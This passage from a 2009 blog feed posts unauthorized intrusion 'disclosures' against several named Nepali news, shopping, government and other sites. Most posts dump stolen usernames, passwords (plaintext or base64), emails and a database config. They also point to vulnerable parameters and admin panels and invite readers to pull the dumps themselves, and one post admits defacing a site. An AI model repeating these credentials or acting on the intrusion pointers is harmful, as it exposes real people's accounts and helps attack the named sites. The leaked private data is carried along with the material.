rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2774062722282131125</id><published>2009-12-05T10:26:00.000-08:00</published><updated>2009-12-19T07:08:48.771-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='myrepublica.com'/><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>www.myrepublica.com multiple SQLi and XSS vulnerabilities</title><content type='html'>Myrepublica is one of the newer magazines and the site http://www.myrepublica.com is their online site. They usually do news update and hence the site provides recent news and happenings easily to the website visitors... But, again they are not secured and suffer from normal SQLi injection vulnerabilities.&lt;br /&gt;Here are some dumps from the table &lt;span style="font-weight: bold;"&gt;users&lt;/span&gt;.&lt;br /&gt;Username: password: emailid&lt;br /&gt;&lt;br /&gt;ameet:1dhakal2:ameet@myrepublica.com&lt;br /&gt;bikash:bik31@:bikash@myrepublica.com&lt;br /&gt;prem:1khanal2:prem@myrepublica.com&lt;br /&gt;premdhakal:dhakal123:premdhakal@myrepublica.com&lt;br /&gt;pawan:terobaumerobau:pawan148@yahoo.com&lt;br /&gt;&lt;br /&gt;etc...&lt;br /&gt;&lt;br /&gt;Sample screenshot:&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/SxqoyHpJQCI/AAAAAAAAAAk/fsWQoWWIodQ/s1600-h/myrepublica.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 247px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/SxqoyHpJQCI/AAAAAAAAAAk/fsWQoWWIodQ/s320/myrepublica.jpg" alt="" id="BLOGGER_PHOTO_ID_5411823481237618722" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Some fucking notes to them:&lt;br /&gt;1) Don't fucking keep plain passes in DB&lt;br /&gt;2) Don't fucking make re-use of the same password&lt;br /&gt;3) Read sam207's article on securing this vulnerability...&lt;br /&gt;4) You're giving us the location of admin panels. fuck you... learn the sense of security.&lt;br /&gt;&lt;br /&gt;Sorry but you are so lame that I had to deface you. No offense to myrepublica team(actually I like your newspaper), this message is to the developers of the site....&lt;br /&gt;EDIT: I also found the site search system to be vulnerable to cross site scripting vulnerability.&lt;br /&gt;Thank you!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2774062722282131125?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2774062722282131125/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwmyrepublicacom-multiple-sqli.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2774062722282131125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2774062722282131125'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwmyrepublicacom-multiple-sqli.html' title='www.myrepublica.com multiple SQLi and XSS vulnerabilities'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_R7J4rokcecI/SxqoyHpJQCI/AAAAAAAAAAk/fsWQoWWIodQ/s72-c/myrepublica.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-1024597718271991940</id><published>2009-12-01T19:08:00.000-08:00</published><updated>2009-12-01T19:50:31.426-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='thehimalayantimes.com'/><title type='text'>www.thehimalayantimes.com SQLi vulnerability</title><content type='html'>The himalayan times is one of the national daily newspapers from nepal and its site www.thehimalayantimes.com like other common nepali websites is also vulnerable to normal web hack. Its again lame SQL injection caused due to the poor coding level. I am having eye pain right now because of welding so I won't be posting much but anyway below is the SQLi hack...&lt;br /&gt;the admin information can be stolen from admin table while tbl_member consists of registered user information so this may lead to secret private data stealing....&lt;br /&gt;admin table consists of columns:&lt;br /&gt;admin_user&lt;br /&gt;admin_pass&lt;br /&gt;admin_email&lt;br /&gt;admin_fullname, etc.&lt;br /&gt;&lt;br /&gt;So SQL query: SELECT * FROM admin&lt;br /&gt;is going to give us everything on table admin...&lt;br /&gt;And they are also using base64 encoding. I have said previously too that a single call to base64_decode() in PHP or using online base64 decoders (www.yellowpipe.com has one) we are gonna get the actual pass easily.&lt;br /&gt;Some dumps:&lt;br /&gt;&lt;b&gt;user:pass:email for admin&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;sajy.j:Z0kzdDRQOXM=:sajyjacob@yahoo.com&lt;br /&gt;bipul:YmlwdWxzMQ==:bipulendra.adhikari@gmail.com&lt;br /&gt;ARUN:c2lsaWNh:monsterdom@gmail.com&lt;br /&gt;etc.&lt;br /&gt;You can try and get the dumps yourself; no more dumps.&lt;br /&gt;Read the article I have written in my blog sampctricks.blogspot.com &amp;nbsp;&lt;a href="http://sampctricks.blogspot.com/2009/05/securing-php-avoid-basic-exploits-and.html"&gt;http://sampctricks.blogspot.com/2009/05/securing-php-avoid-basic-exploits-and.html&lt;/a&gt; in order to remove these vulnerabilities. You have lots of them in your scripts.&lt;br /&gt;Edit:&lt;br /&gt;again it is F1 Soft work most probably and has got so many vulnerabilities. Admin panel is in a bit less used place but we can find it easily (No need to overthink and do bruteforcing for admin cp)... Also @THT admins, do not change location of admin panel rather secure your scripts...&lt;br /&gt;Couldnot upload the screenshot because of slow net connection and my eye problem...&lt;br /&gt;&lt;br /&gt;Thanks...&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1024597718271991940?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/1024597718271991940/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwthehimalayantimescom-sqli.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1024597718271991940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1024597718271991940'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwthehimalayantimescom-sqli.html' title='www.thehimalayantimes.com SQLi vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-787226249614638372</id><published>2009-11-29T08:26:00.000-08:00</published><updated>2009-11-29T08:26:31.493-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='newsofnepal.com'/><title type='text'>NewsOfNepal.com SQLi Vulnerability</title><content type='html'>www.newsofnepal.com is just pretty insecure and more pwnage could have been carried out. Thanks to Cyb3r Lord for allowing me to post the thing he found... F1 Soft is one of the top IT company in Nepal but when it comes to coding, they suck...&lt;br /&gt;This one is another disclosure of one of the big sites from Nepal. So lets go on...&lt;br /&gt;There are few scripts that forget to validate the inputs and we are not disclosing how the things are vulnerable because we are not for script kiddies. Using MySQL &amp;gt; 5 means we can extract tables and columns easily.&lt;br /&gt;Some tables are:&lt;br /&gt;admin&lt;br /&gt;advertisement&lt;br /&gt;polling_user&lt;br /&gt;etc.&lt;br /&gt;And some tables are:&lt;br /&gt;admin_pass&lt;br /&gt;admin_user&lt;br /&gt;admin_email&lt;br /&gt;under admin table.&lt;br /&gt;Now on extracting pass, I saw it was base64 encoded(FUCK). Use other hashing like md5() to encrypt. You are PHP guys and you should have known base64_decode($hash) is gonna give us the pass...&lt;br /&gt;Anyway below is the screenshot of the pwnage:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/SxKgj1kmVcI/AAAAAAAAABY/wr2G3jJ1wjE/s1600/newsofnepal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/SxKgj1kmVcI/AAAAAAAAABY/wr2G3jJ1wjE/s320/newsofnepal.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span id="goog_1259507611154"&gt;&lt;/span&gt;&lt;span id="goog_1259507611155"&gt;&lt;/span&gt;&lt;br /&gt;Thanks...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-787226249614638372?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/787226249614638372/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/newsofnepalcom-sqli-vulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/787226249614638372'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/787226249614638372'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/newsofnepalcom-sqli-vulnerability.html' title='NewsOfNepal.com SQLi Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_RVRW0sa79Nw/SxKgj1kmVcI/AAAAAAAAABY/wr2G3jJ1wjE/s72-c/newsofnepal.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-7745108316577125418</id><published>2009-11-28T09:46:00.000-08:00</published><updated>2009-11-28T09:46:35.630-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='gov.np'/><category scheme='http://www.blogger.com/atom/ns#' term='government sites'/><title type='text'>MOE.GOV.NP Multiple Vulnerability</title><content type='html'>Nothing much to say, www.moe.gov.np is the site of ministry of education which was rebuilt few months ago. But the site consists of multiple security breaches that can be used to own it.&lt;br /&gt;So what are the vulnerabilities:&lt;br /&gt;First, SQLi, second Insecure admin panel and third insecure session handling.&lt;br /&gt;FuCK YoU to the developer for fucking insecure programming.&lt;br /&gt;Now let me do some dumps:&lt;br /&gt;&lt;br /&gt;File: clientConfigure.php&lt;br /&gt;............&lt;br /&gt;define("HOST","localhost");&lt;br /&gt;define("USERNAME","moegov_moe");&lt;br /&gt;define("PASSWORD","moepwd");&lt;br /&gt;define("DBASE","moegov_moe");&lt;br /&gt;............&lt;br /&gt;............&lt;br /&gt;&lt;br /&gt;File: cms.php&lt;br /&gt;.........&lt;br /&gt;switch($_GET["task"])&lt;br /&gt;{&lt;br /&gt;case "":&lt;br /&gt;$query = "SELECT * FROM cms where publish='Y' and  menuId=".$_GET["id"]; // sql&lt;br /&gt;$sql = mysql_query($query);&lt;br /&gt;//wtf? query without sanitizing GET variable, fuck...&lt;br /&gt;..............&lt;br /&gt;............&lt;br /&gt;$query = "SELECT *  FROM cms where publish='Y' and  cmsId=".$_GET["contId"]; // sql&lt;br /&gt;$rs=mysql_query($query) or die(mysql_error());&lt;br /&gt;//again same fuck&lt;br /&gt;&lt;br /&gt;File: index.php&lt;br /&gt;Vuln to SQLi but good practice for file inclusions.&lt;br /&gt;&lt;br /&gt;..........&lt;br /&gt;......&lt;br /&gt;switch($_GET["option"])&lt;br /&gt;{&lt;br /&gt;case "":&lt;br /&gt;require_once("./clientIncludes/tabContent.php");&lt;br /&gt;break;&lt;br /&gt;case "download":&lt;br /&gt;require_once("./option/download/download.php");&lt;br /&gt;break;&lt;br /&gt;...........&lt;br /&gt;.....&lt;br /&gt;&lt;br /&gt;File: admin/centreContent.php&lt;br /&gt;// where is login session...&lt;br /&gt;&amp;lt;?php&lt;br /&gt;switch($_GET["option"]){&lt;br /&gt;case "menu":&lt;br /&gt;require_once("./option/menu/menu.php");&lt;br /&gt;break;&lt;br /&gt;case "user":&lt;br /&gt;require_once("./option/user/user.php");&lt;br /&gt;break;&lt;br /&gt;......&lt;br /&gt;...&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;File: cpanel.config&lt;br /&gt;&lt;br /&gt;#### NOTICE ####&lt;br /&gt;# After manually editing any configuration settings in this file,&lt;br /&gt;# please run '/usr/local/cpanel/whostmgr/bin/whostmgr2 --updatetweaksettings'&lt;br /&gt;# to fully update your server's configuration.&lt;br /&gt;&lt;br /&gt;RS=x3&lt;br /&gt;VALIASDIR=/etc/valiases&lt;br /&gt;VFILTERDIR=/etc/vfilters&lt;br /&gt;access_log=/usr/local/cpanel/logs/access_log&lt;br /&gt;adminuser=cpanel&lt;br /&gt;allow_server_info_status_from=&lt;br /&gt;allowcpsslinstall=1&lt;br /&gt;allowparkhostnamedomainsubdomains=0&lt;br /&gt;allowparkonothers=0&lt;br /&gt;allowperlupdates=0&lt;br /&gt;allowremotedomains=0&lt;br /&gt;allowresellershostnamedomainsubdomains=0&lt;br /&gt;allowunregistereddomains=0&lt;br /&gt;alwaysredirecttossl=0&lt;br /&gt;apache_port=0.0.0.0:80&lt;br /&gt;apache_ssl_port=0.0.0.0:443&lt;br /&gt;autocreateaentries=1&lt;br /&gt;awstatsbrowserupdate=0&lt;br /&gt;awstatsreversedns=0&lt;br /&gt;basename=cpanel&lt;br /&gt;blockcommondomains=1&lt;br /&gt;check_zone_syntax=1&lt;br /&gt;conserve_memory=0&lt;br /&gt;coredump=0&lt;br /&gt;cpaddons_adminemail=&lt;br /&gt;cpaddons_autoupdate=1&lt;br /&gt;cpaddons_max_moderation_req_all_mod=99&lt;br /&gt;cpaddons_max_moderation_req_per_mod=99&lt;br /&gt;cpaddons_moderation_request=0&lt;br /&gt;cpaddons_no_3rd_party=0&lt;br /&gt;cpaddons_no_modified_cpanel=1&lt;br /&gt;cpaddons_notify_owner=1&lt;br /&gt;cpaddons_notify_root=1&lt;br /&gt;cpredirect=Origin Domain Name&lt;br /&gt;cpredirectssl=SSL Certificate Name&lt;br /&gt;cpsrvd-domainlookup=0&lt;br /&gt;cpsrvd-gzip=1&lt;br /&gt;cycle=1&lt;br /&gt;default_login_theme=cpanel&lt;br /&gt;defaultmailaction=localuser&lt;br /&gt;deny_quicksupport_password=0&lt;br /&gt;disable_compiled_dnsadmin=0&lt;br /&gt;disableipnscheck=0&lt;br /&gt;disablequotacache=0&lt;br /&gt;disablexfercpanel=0&lt;br /&gt;discardformmailbccsubject=1&lt;br /&gt;dnsadminapp=&lt;br /&gt;dnslookuponconnect=0&lt;br /&gt;docroot=/usr/local/cpanel/base&lt;br /&gt;domainowner_mail_pass=0&lt;br /&gt;dumplogs=1&lt;br /&gt;emailpasswords=1&lt;br /&gt;emailusers_diskusage_critical_contact_admin=1&lt;br /&gt;emailusers_diskusage_critical_percent=90&lt;br /&gt;emailusers_diskusage_full_contact_admin=1&lt;br /&gt;emailusers_diskusage_full_percent=98&lt;br /&gt;emailusers_diskusage_warn_contact_admin=1&lt;br /&gt;emailusers_diskusage_warn_percent=80&lt;br /&gt;emailusers_mailbox_critical_percent=90&lt;br /&gt;emailusers_mailbox_full_percent=98&lt;br /&gt;emailusers_mailbox_warn_percent=80&lt;br /&gt;emailusersbandwidthexceed=1&lt;br /&gt;emailusersbandwidthexceed70=0&lt;br /&gt;emailusersbandwidthexceed75=0&lt;br /&gt;emailusersbandwidthexceed80=1&lt;br /&gt;emailusersbandwidthexceed85=0&lt;br /&gt;emailusersbandwidthexceed90=0&lt;br /&gt;emailusersbandwidthexceed95=1&lt;br /&gt;emailusersbandwidthexceed97=0&lt;br /&gt;emailusersbandwidthexceed98=0&lt;br /&gt;emailusersbandwidthexceed99=0&lt;br /&gt;engine=cpanel&lt;br /&gt;enginepl=cpanel.pl&lt;br /&gt;engineroot=/usr/local/cpanel&lt;br /&gt;errorstostdout=1&lt;br /&gt;exim-retrytime=60&lt;br /&gt;eximmailtrap=1&lt;br /&gt;extracpus=0&lt;br /&gt;file_upload_max_bytes=unlimited&lt;br /&gt;file_upload_must_leave_bytes=5&lt;br /&gt;ftppasslogs=1&lt;br /&gt;ftpserver=pure-ftpd&lt;br /&gt;htaccess_check_recurse=2&lt;br /&gt;ignoredepreciated=0&lt;br /&gt;interchangever=disable&lt;br /&gt;jaildefaultshell=0&lt;br /&gt;keepftplogs=0&lt;br /&gt;keeplogs=0&lt;br /&gt;keepstatslog=0&lt;br /&gt;loadthreshold=2&lt;br /&gt;local_nameserver_type=bind&lt;br /&gt;logchmod=0640&lt;br /&gt;logout_redirect_url=&lt;br /&gt;maildir=1&lt;br /&gt;mailserver=courier&lt;br /&gt;maxemailsperhour=0&lt;br /&gt;maxmem=256&lt;br /&gt;myname=cpaneld&lt;br /&gt;mysql-version=5.0&lt;br /&gt;mysqldebug=0&lt;br /&gt;nativessl=1&lt;br /&gt;nobodyspam=0&lt;br /&gt;nosendlangupdates=0&lt;br /&gt;nouserbackupwarn=0&lt;br /&gt;numacctlist=50&lt;br /&gt;php_max_execution_time=90&lt;br /&gt;php_post_max_size=55M&lt;br /&gt;php_register_globals=0&lt;br /&gt;php_upload_max_filesize=50M&lt;br /&gt;phploader=none&lt;br /&gt;popbeforesmtpsenders=0&lt;br /&gt;port=2082&lt;br /&gt;product=cPanel&lt;br /&gt;proxysubdomains=1&lt;br /&gt;proxysubdomainsfornewaccounts=1&lt;br /&gt;proxysubdomainsoverride=1&lt;br /&gt;publichtmlsubsonly=0&lt;br /&gt;python=/usr/bin/python2.4&lt;br /&gt;referrerblanksafety=0&lt;br /&gt;referrersafety=0&lt;br /&gt;remotedomainscheck=1&lt;br /&gt;remotewhmtimeout=35&lt;br /&gt;resetpass=1&lt;br /&gt;rollback=0&lt;br /&gt;root=/usr/local/cpanel&lt;br /&gt;showwhmbwusageinmegs=0&lt;br /&gt;skipanalog=1&lt;br /&gt;skipawstats=0&lt;br /&gt;skipboxcheck=0&lt;br /&gt;skipboxtrapper=0&lt;br /&gt;skipbwlimitcheck=0&lt;br /&gt;skipdiskcheck=0&lt;br /&gt;skipformmail=1&lt;br /&gt;skiphorde=0&lt;br /&gt;skiphttpauth=0&lt;br /&gt;skipmailman=0&lt;br /&gt;skipmelange=1&lt;br /&gt;skipnotifyacctbackupfailure=0&lt;br /&gt;skipparentcheck=0&lt;br /&gt;skiproundcube=0&lt;br /&gt;skipspamassassin=0&lt;br /&gt;skipspambox=0&lt;br /&gt;skipsqmail=0&lt;br /&gt;skipwebalizer=1&lt;br /&gt;skipwhoisns=0&lt;br /&gt;stats_log=/usr/local/cpanel/logs/stats_log&lt;br /&gt;statsloglevel=1&lt;br /&gt;statthreshhold=256&lt;br /&gt;stunnel=/usr/sbin/stunnel&lt;br /&gt;tcp_check_failure_threshold=3&lt;br /&gt;urchinsetpath=&lt;br /&gt;use_safe_quotas=1&lt;br /&gt;useauthnameservers=0&lt;br /&gt;usemailformailmanurl=1&lt;br /&gt;usemysqloldpass=0&lt;br /&gt;version=8.0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Feeling boring after the pwnage. Need to do mathematics assignment. That was the pwnage of moe.gov.np&lt;br /&gt;They are pretty insecure. The method not disclosed over here but good hackers can find it. Sorry, script kiddies...&lt;br /&gt;Thanks...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7745108316577125418?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/7745108316577125418/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/moegovnp-multiple-vulnerability.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7745108316577125418'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7745108316577125418'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/moegovnp-multiple-vulnerability.html' title='MOE.GOV.NP Multiple Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-1250407222321590210</id><published>2009-11-14T02:14:00.000-08:00</published><updated>2009-11-14T02:20:24.088-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='khullabazaar.com'/><title type='text'>KhullaBazaar.com Shopping Site SQL Vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Site&lt;/span&gt;: www.khullabazaar.com&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Risk&lt;/span&gt;: High [Critical informations can be stolen]&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Notified&lt;/span&gt;: YES [in a way]&lt;br /&gt;/*Action from Admin: N/A*/&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Vulnerable file&lt;/span&gt;: You should figure it out easily&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit&lt;/span&gt;: The php script do not validate the inputs from user which can be used to compromise the database.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution&lt;/span&gt;: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;If any of the site admin is viewing this page, you can contact me or sam to know what's vulnerable and how to fix it. Don't take the pwnage negatively...&lt;br /&gt;Thanks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1250407222321590210?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/1250407222321590210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/khullabazaarcom-shopping-site-sql.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1250407222321590210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1250407222321590210'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/khullabazaarcom-shopping-site-sql.html' title='KhullaBazaar.com Shopping Site SQL Vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-8628339549925226877</id><published>2009-11-09T20:29:00.000-08:00</published><updated>2009-11-09T20:29:41.179-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='dc-nepal.com'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='cross site scripting'/><title type='text'>DC-nepal.com Multiple Vulnerabilities</title><content type='html'>I got the link to the site from some nepali social networking site and was just testing the security issues of the site as the &lt;b&gt;about us&lt;/b&gt; page stated that the people of DC-nepal are quite good in computer technology. I started with general web hacks and unfortunately found this site to be vulnerable to SQL injection and persistent cross site scripting. So I thought to share this with you guys.&lt;br /&gt;SQLi:&lt;br /&gt;http://www.dc-nepal.com/nepali_model.php?id=437&lt;br /&gt;The id variable is not well sanitized so valid queries can be injected to the site. Since the MySQL version&gt;5, its even more easier for hackers to get different credentials from the site.&lt;br /&gt;Some tables:&lt;br /&gt;admin&lt;br /&gt;dc_classicfied&lt;br /&gt;&lt;br /&gt;Login user/hash: laxman: hnz/uP1502jYsjqs//hCfg==&lt;br /&gt;You need to decrypt the password and you can login from /admin.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Persistent XSS:&lt;br /&gt;http://www.dc-nepal.com/nepali_model.php?id=437&lt;br /&gt;The comment form doesn't filter any malicious so this can be used to drop executables and redirects.&lt;br /&gt;Hope they make a quick fix. They were notified...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-8628339549925226877?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/8628339549925226877/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/dc-nepalcom-multiple-vulnerabilities.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/8628339549925226877'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/8628339549925226877'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/11/dc-nepalcom-multiple-vulnerabilities.html' title='DC-nepal.com Multiple Vulnerabilities'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-5498957393619658403</id><published>2009-10-31T22:05:00.001-07:00</published><updated>2009-10-31T22:05:59.079-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='local file inclusion'/><category scheme='http://www.blogger.com/atom/ns#' term='lfi'/><category scheme='http://www.blogger.com/atom/ns#' term='venus.com.np'/><title type='text'>Venus.com.np Security Disclosure</title><content type='html'>Venus.com.np Hackz:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Last 4 lines of .htaccess:&lt;br /&gt;&lt;br /&gt;AuthType Basic&lt;br /&gt;&lt;br /&gt;AuthName www.venus.com.np&lt;br /&gt;&lt;br /&gt;AuthUserFile /home/venus/public_html/_vti_pvt/service.pwd&lt;br /&gt;&lt;br /&gt;AuthGroupFile /home/venus/public_html/_vti_pvt/service.grp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Example of poor coding:&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;$inc = $_GET['page'] . '.php';&lt;br /&gt;&lt;br /&gt;if ($inc == '.php') $inc = 'home.php';&lt;br /&gt;&lt;br /&gt;//echo $inc;&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nothing more to say. You know how vulnerable they are. Happy Hacking!!! :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5498957393619658403?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/5498957393619658403/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/venuscomnp-security-disclosure.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5498957393619658403'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5498957393619658403'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/venuscomnp-security-disclosure.html' title='Venus.com.np Security Disclosure'/><author><name>Cool 